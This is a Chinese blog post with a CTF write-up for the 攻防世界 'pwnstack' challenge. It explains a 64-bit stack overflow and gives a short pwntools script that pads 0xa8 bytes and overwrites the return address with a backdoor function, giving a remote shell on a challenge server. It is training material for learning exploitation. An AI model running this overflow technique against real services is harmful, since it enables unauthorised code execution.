攻防世界 pwnstack writeup

最新推荐文章于 2024-04-04 21:12:24 发布
最新推荐文章于 2024-04-04 21:12:24 发布
阅读量812 收藏 6
点赞数 1
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130919537
版权

题目(六):
【题型】PWN
【题目】pwnstack
【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list
【思路】栈溢出
【具体步骤】
Step1:checksec一下,发现程序是一个只有NX的64位程序
在这里插入图片描述

Step2:将程序放到IDApro下进行静态分析。
在这里插入图片描述

Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
在这里插入图片描述

Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。
在这里插入图片描述
在这里插入图片描述

Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762

在这里插入图片描述
在这里插入图片描述

Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。
源码:

from pwn import *
p=remote("61.147.171.105",59432)
payload=b'a'*0xa8+p64(0x400762)
p.sendline(payload)
p.interactive()

在这里插入图片描述

22的卡卡
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 pwn
清霂的博客
02-02 631
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
CTF特训营》——PWN:二进制安全基础
PICACHU+++的博客
08-13 2657
即DEP,是进制程序在非可执行的内存区中执行指令。在80x86体系中,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
PWN入门&Protostar靶场Stack系列
cike_y
01-24 1082
pwn入门靶场笔记
攻防世界pwn难度1
weixin_63282980的博客
11-05 1614
攻防世界难度1的题目WP
pwn--攻防世界 pwn1
最新发布
A13837377363的博客
04-04 435
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3664
攻防世界-Pwn-new-easypwn
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界 notsequence
12-21
自己算法太菜了, 这道题的2个函数始终没看懂… 看了writeup, 杨辉三角形! 看了writeup, 自己慢慢的分析了下. 首先, check1函数. 原创文章 3获赞 1访问量 108 关注 私信 展开阅读全文 作者:B&X
2023 强网杯 Writeup
01-29
2023 强网杯 Writeup
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
古典加密writeup
01-05
CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2010
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 171
做题记录
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 393
做题记录
攻防世界pwn stack2 wp
苗_的博客
10-14 280
拖进ida查看,找到溢出点: 通过这里我们可以更改数组中任意元素的值,那么,如果要更改返回位置的话我们就要去计算main函数返回位置距离数组的偏移是多少了。(这道题的难点也是在这里) 思路:我们在输入的时候,输入数组的第1个元素,看他存储在栈中的哪个位置,然后再看函数漏洞所在函数(main)最后返回时,栈顶的值,他们的差值就是数组的大小加上ebp。 找到后门函数: 但是后来发现靶机上没有bash,所以你可以把这个看成是一个假的后门qaq, 我们可以找到system函数,然后用后门里的"sh"
攻防世界pwn高手区stack2 lea调整栈帧导致偏移错误
Gtooler的博客
10-14 1720
Stack2 这题废话很多,说白了就一个数组越界的漏洞可以利用,没有对下标v5做限定,所以可以利用数组越界,直接越过canary,利用留下的后门getshell 刚开始看ida以为位移是0x74所以exp如下 from pwn import * p = remote('111.200.241.244', '50928') # p = process("./stack2") # context.log_level = 'debug' hackhere = [0x9b, 0x85, 0x04, 0x08
攻防世界pwn新手练习(when_did_you_born)
BurYiA的博客
09-16 563
when_did_you_born ok 多余的话就不继续累赘了昂,直接上手 程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
攻防世界shuffle
09-03
攻防世界Shuffle是一个在攻防世界平台上的题目,属于Reverse(逆向工程)类别的进阶区的题目。该题目的具体来源是SECCON-CTF-2014比赛。题目要求参与者找到一个字符串在随机化之前的顺序。关于该题目的详细解法可以在提供的博客链接中找到。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [攻防世界 Shuffle](https://blog.csdn.net/afanzcf/article/details/119462993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [攻防世界Wire1杂项](https://download.csdn.net/download/m0_59188912/87097386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [攻防世界Reverse进阶区-Shuffle-writeup](https://blog.csdn.net/qq_35056292/article/details/108676766)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值